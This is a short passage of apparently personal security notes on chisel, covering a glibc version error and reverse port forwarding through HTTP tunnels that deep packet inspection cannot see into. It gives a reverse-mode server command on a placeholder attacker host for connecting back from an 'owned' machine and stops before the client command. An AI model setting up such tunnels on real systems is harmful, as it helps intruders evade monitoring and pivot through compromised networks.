fanicia/security-notes/notes/port-forwarding-ssh-tunneling/chisel.md

 > /chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32` not found (required by ./chisel) go [here](https://github.com/jpillora/chisel/releases) for the appropriate release.

 Chisel makes it possible to do HTTP tunneling encrypted such that deep packet inspection won't be able to look into the details of the traffic.

+Note that you can state multiple forwarding statements in a single `chisel client ...` command.

+## Dynamic Port Forwarding

 We run a chisel server on `${ATTACKER_IP}` which allows us to connect back from an owned machine:

 ```
 chisel server --port ${ATTACKER_PORT} --reverse
 ```

 From the `${OWNED_IP0}`, run